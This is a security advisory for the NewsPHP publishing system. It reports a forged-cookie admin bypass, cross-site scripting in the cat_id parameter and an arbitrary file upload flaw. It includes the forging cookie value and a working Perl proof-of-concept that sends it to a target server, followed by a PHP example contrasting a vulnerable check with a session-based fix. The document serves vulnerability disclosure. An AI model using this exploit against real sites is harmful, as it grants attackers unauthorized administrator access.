NewsPHP Admin Access and Cross Site Scripting Vulnerability
Security-Corporation ID : SC-1007
URL : http://www.security-corporation.com/articles-20040412-001.html
Author : Manuel Lopez <firstname.lastname@example.org>
Product : NewsPHP (All versions)
Source Message Contents :
#Title: XSS, Admin Access via Cookie and File Upload vulnerability in
#Software: NewsPHP (All versions)
#Underlying OS: All
NewsPHP is a perfect solution for creating a web publishing system, such as
an online magazine, newspaper, TV/Radio or news portal. It also works as a
Content Management System that is easy to install and manage without having
to FTP upload your pages every time you need to update them.
A security vulnerability in the product allows attackers to cause the
product to think they are administrators by placing a fake Administrator
cookie on their computer.
A File Upload vulnerability in the Admin panel allows authenticated users
to upload arbitrary files instead of a video file.
The product is also vulnerable to Cross-Site Scripting.
The flaw is caused because cookie data is not properly checked for
This is the cookie and POC to gain administrator privileges in newsPHP:
### autorized=admin; root=admin ###
## PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP) ##------------
## Example: POCnws.pl www.vulnerweb.com newsadmin POCnws.htm
use IO::Socket;
# Require host, directory and output file arguments.
if (@ARGV < 3)
{
print "PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP)\n\n";
print "Usage: POCnws.pl [host] [directory] [file.htm]\n\n";
print "By: Manuel Lopez mantra at gulo.org\n";
exit(1);
}
$host = $ARGV[0];
$directorio = $ARGV[1];
$fichero = $ARGV[2];
print "----- Conecting .. <====\n\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "$host",PeerPort => "80") || die
"$socket error $!";
print "====> Conected\n";
print "====> Sending Data .. \n";
# Request the admin directory with the forged cookie.
$socket->print(<<fin) or die "write: $!";
GET http://$host/$directorio/ HTTP/1.1
Cookie: autorized=admin; root=admin

fin
print "====> OK\n";
print "====> Generating $fichero ...\n";
# Save the server's response to the output file.
open( Result, ">$fichero");
print Result while <$socket>;
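The root cause described above, treating a client-supplied cookie as proof of administrator status, is shown here next to a server-side session check. This is an added example, not NewsPHP code: the advisory does not show the product's source, so the vulnerable check is an assumed reconstruction using the cookie names from the PoC, and all function names are hypothetical.

```php
<?php
// Added illustration only: the advisory does not show NewsPHP's source.
// All function names below are hypothetical.

// Assumed vulnerable pattern: privilege is read straight from cookies the
// client controls, so "autorized=admin; root=admin" is accepted as proof.
function is_admin_vulnerable(array $cookies): bool
{
    return ($cookies['autorized'] ?? '') === 'admin'
        && ($cookies['root'] ?? '') === 'admin';
}

// Hardened pattern: the cookie holds only a random session id. The admin
// flag lives server-side and is set only after the password is verified.
function login_admin(string $password, string $storedHash): bool
{
    if (!password_verify($password, $storedHash)) {
        return false;
    }
    session_regenerate_id(true);   // new id on privilege change (anti-fixation)
    $_SESSION['is_admin'] = true;
    return true;
}

function is_admin_hardened(): bool
{
    // Request cookies such as "root=admin" are never consulted here.
    return ($_SESSION['is_admin'] ?? false) === true;
}

session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Strict']);
session_start();

// Constructed inputs: the forged cookies from the PoC and a demo password.
$forged = ['autorized' => 'admin', 'root' => 'admin'];
$hash = password_hash('constructed-demo-password', PASSWORD_DEFAULT);

$results = [
    'vulnerable check, forged cookies' => is_admin_vulnerable($forged),
    'hardened check, forged cookies' => is_admin_hardened(),
    'hardened check, wrong password' => login_admin('guess', $hash) && is_admin_hardened(),
    'hardened check, correct password' => login_admin('constructed-demo-password', $hash) && is_admin_hardened(),
];
var_export($results);
```

Run from the PHP command line, it prints the outcome of each check; only the vulnerable check accepts the forged cookies.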
A remote user can conduct cross-site scripting attacks due to an input
validation flaw in the cat_id variable.
#File Upload vulnerability#
A user with privileges can upload executable code instead of a video
Panel. Once the code has been uploaded, a user can execute the code by
calling the file; it will be executed with the privileges of the web server.
There is no solution at the moment.
Vendor contacted Apr 3 2004
Manuel Lopez, email@example.com